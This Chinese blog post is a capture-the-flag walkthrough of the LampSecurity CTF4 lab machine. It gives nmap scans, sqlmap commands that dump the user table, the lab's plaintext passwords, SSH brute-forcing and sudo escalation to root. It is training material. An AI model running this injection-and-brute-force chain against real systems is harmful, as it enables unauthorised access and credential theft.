LampSecurity-CTF4 靶场记录

已于 2023-08-16 11:56:59 修改
阅读量200 收藏 1
点赞数
文章标签: 网络安全 安全 系统安全 web安全
于 2023-08-15 16:35:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52729465/article/details/132297689
版权

一、信息收集

arp-scan -l

在这里插入图片描述
获得靶机ip 192.168.91.135
进行常规nmap扫描

nmap -sT --min-rate 10000 -p- 192.168.91.135
nmap -sT -sV -sC -O -p22,25,80,631 192.168.91.135
nmap --script=vuln -p22,25,80,631 192.168.91.135

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
扫描出来四个端口,22端口ssh服务,25端口smtp服务(用于邮件的发送),80端口http服务,631端口关闭ipp服务
打开web界面,内容是一些其他语言,没有什么收获。
在这里插入图片描述

通过上面的信息,我们查看到可能存在sql注入漏洞,测试一下。

二、漏洞利用-SQL注入

在这里插入图片描述
页面有变化,说明存在SQL注入,使用sqlmap进行注入。

sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" --dbs
//爆库

在这里插入图片描述

sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" -D ehks --tables
//爆表

在这里插入图片描述

sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" -D ehks -T user --columns
//爆列

在这里插入图片描述

sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" -D ehks -T user -C user_name,user_pass
//爆详细信息

在这里插入图片描述

user_name:
achen
dstevens
ghighland
jdurbin
pmoore
sorzek

user_pass:
seventysixers
ilike2surf
undone1
Sue1978
Homesite
pacman

三、SSH连接

将得到的用户名和密码存在kali本地文件后使用ssh爆破
在这里插入图片描述
爆破不太成功,查看ERROR发现是服务器端和客户端使用的算法不一致导致无法登录
在/etc中修改ssh_config文件
在这里插入图片描述
将下面的代码加进去即可

KexAlgorithms diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
Ciphers chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
HostKeyAlgorithms ssh-rsa,ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256
MACs hmac-md5,hmac-sha1,umac-64@openssh.com

在这里插入图片描述
在这里插入图片描述

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.91.135
//将Their offer后面提供的算法加入到参数中

在这里插入图片描述
成功登录,使用sudo -l发现可以直接提权
在这里插入图片描述
在这里插入图片描述
成功拿到root。

四、总结

1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。
2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。
3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。
4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。
5、登录到ssh后发现可以直接提权。

ke1yy
关注
ctf实战 掌控安全靶场 第五关通关记录
wh1te 小白的博客
09-27 1137
题目 cookie上一关获得了 就直接在开发者工具里自己修改cookie即可,我用的火狐直接修改就是了(f12)  将名称改为上一关获得的cookie名,值改为上一关得到的cookie值 修改好了点击“准备好了即可” 查看可以上传文件类型 发现可以上传cer文件可以利用iis6.0漏洞进行上传asp木马后缀名改为.cer  用菜刀上传即可 在产品管理中可以修改 文件图片 ...
LampSecurity-CTF5 靶场记录
m0_52729465的博客
08-19 112
3、进入到amy用户后,通过查看/var/mail目录下查看邮件信息,查询到patrick应该是管理员,使用ls -liah查看patrick中是否有可利用文件,进入.tomboy目录下发现有几个note文件,其中一个文件中具有root的密码,直接使用su切换到root命令提示需要提高交互性,2、拿到账号密码后成功登录到后台界面,寻找可以进行代码执行的界面,最终在上传blog的界面放入一句话木马,访问后使用蚁剑连接(这里使用nc -e没法行通,是因为不支持-e参数,可直接使用bash命令反弹shell)。
【学渗透靶机——lampSecurityCTF4
jieli0901227的博客
05-13 317
page=blog&title=Blog&id=2 地址存在注入。发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码。2、使用 order by 判断数据库的列。5、查询user 表的字段信息。4、查询当前数据库有哪些表。3、使用联合注入找报错点。nmap 主机漏洞探测。扫描出也没什么有用信息。1、通过浏览页面发现。
LAMPSecurityCTF4靶机渗透流程
RemedyVI的博客
07-11 239
碰巧能够登录SSH只能说运气比较好,但是实际渗透中这种情况很少,如果不是这样的话那这台靶机就不会是这么简单了。总轨发现了3个可登录的目录/admin/mail/restricted/,都可以用上面的用户中的一些或全部登录。一个关于数据库敏感信息/sql/sq.db,还有一些带有提示性的文件。内容为:一个日历目录看这个URL可能也是SQL注入或者是文件包含其中/admin可以发布blog,尝试向网页里写入一句话木马但是被过滤了,即使绕过过滤也没法执行。
vulnhub之ctf4
qq_54030686的博客
10-25 1397
检测发现存在sql注入,这里使用sqlmap下载数据库中的数据,别问为什么下载,一个字,快。对80开放的web服务进行检测,这里使用rad加xray配合检测,友情提示,netdiscover或者nmap -sP 192.168.2.0/24。初步进行检测,并且进行端口扫描,发现开放22端口,80端口等。使用ssh登录时候,可能会产生一定的错误,这里给出解决方法。在user数据表中发现用户名以及密码,编辑为字典,时候,输入该用户对应的密码即可成功变成root用户。vulnhub之ctf4
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 基金会 根盒子 设置 npm install -g juice-shop-ctf-cli 用法 互动模式 打开命令行并运行: juice-shop-ctf 然后按照交互式命令行工具的说明进行操作。 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
awesome-ctf-cheatsheet:CTF备忘单
02-02
awesome-ctf-cheatsheet:CTF备忘单
红队打靶LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1834
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
红队笔记7-CTF4打靶流程-sqlmap注入-ssh远程登录
qq_63442530的博客
03-20 1493
CTF4这个靶场很简单,也是因为是09年的靶场了,sqlmap这种工具也没有诞生。思路:80端口->web->注入点->sqlmap获取账号密码->ssh登录打这个靶场也暴露出来我很多的缺点:1.在对web功能简单分析的过程中,老是被没有用的点浪费时间,对功能是否有利用点,分析的不到位,说到底还是自己的经验不足。2.过于依赖工具。红队笔记大佬还提到,进行渗透测试的过程中,我们不能单纯依赖nmap和sqlmap这种自动化工具,还是要了解漏洞的原理与代码的编写,使用工具表面上方便,但会有很多缺点。
ctf实战 封神台的靶场 第四关通关记录
weixin_30437847的博客
05-28 1213
发现留言板功能,顺手试下反射型xss代码,结果成功的弹窗了 网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。 我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个 然后你可以看到一叠代码,这个就是两个模块中的XSS Payload。把生成的存储型xss链接放入留言板提交成功后到xss平台等查...
LAMPSecurity——CTF4
qq_51175992的博客
10-11 224
这个靶场总体来说比较简单(比上周做的DC系列更简单),正常的nmap进行端口信息收集,然后在Web页面发现SQL注入漏洞,借助sqlmap顺利拿到用户和其密码信息。但是在SSH爆破时因为靶场时间太久了,密钥交换的算法不一致导致被一直无法正常爆破,后来通过大佬的指点通过设置密钥算法的参数完成登录。最后的提权部分就是/bin/bash提权就行。
超菜鸟级ctf4
kid的博客
05-12 4976
超菜鸟级ctf4 前言 这次的题是真的很菜鸟级了,我这样的菜鸟都差不多做出了一半 题目 Burg Hohenzollern & Trakai Castle 这是两道sql注入题,基本一摸一样。特别是我用sqlmap来做就完全没有感受到两道题的区别 可以看到上图都是提示添加id参数,在URL后添加?id=1后会发现进入不同的页面,然后我是直接拿sqlmap跑的啊,十分顺利直接能爆库 ...
CTF4靶机训练
weixin_44132032的博客
08-19 4127
CTF4靶机训练环境下载主机发现端口扫描漏洞挖掘SSH利用权限提升 环境下载 链接:https://pan.baidu.com/s/1Kb4RKtnZ5RD43FAnjlYlsg 提取码:d59k Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp -A -sS -sV -p- 目标主机IP 扫描得出目...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8523
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
构建安全基石:网络安全等级保护定级指南
最新发布
w13359990065的博客
10-24 404
通过上述分析,我们可以看出,构建安全基石:网络安全等级保护定级指南精要,不仅提供了系统性的安全防护框架,更为企业提供了明确的实施路径。企业应充分理解定级指南的核心要素,结合自身实际,灵活应用技术防护与管理措施,确保网络安全防护的全面性和有效性,从而在激烈的市场竞争中保持安全稳定的发展态势。网络安全等级保护定级是构建企业网络安全基石的关键步骤,它不仅帮助企业明确安全防护的重点,还指导企业实施有效的安全措施,提升整体安全防护能力。综合业务属性、风险评估和安全需求,经过专家评审,确定信息系统的最终安全等级。
亚信安全DeepSecurity中标知名寿险机构云主机安全项目
亚信安全官方账号的博客
10-23 443
亚信安全中标知名寿险机构云主机安全项目
虚拟机挑战解析:hgame-week4-easyvm与cg-ctf WxyVM
"虚拟机题目解析,包括hgame-week4-easyvm、cg-ctf wxyVM1/2,涉及虚拟机基础知识、数据处理及逆向工程" 虚拟机技术是计算机科学中的一个重要领域,它允许在单一硬件系统上运行多个操作系统实例。在网络安全和密码...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值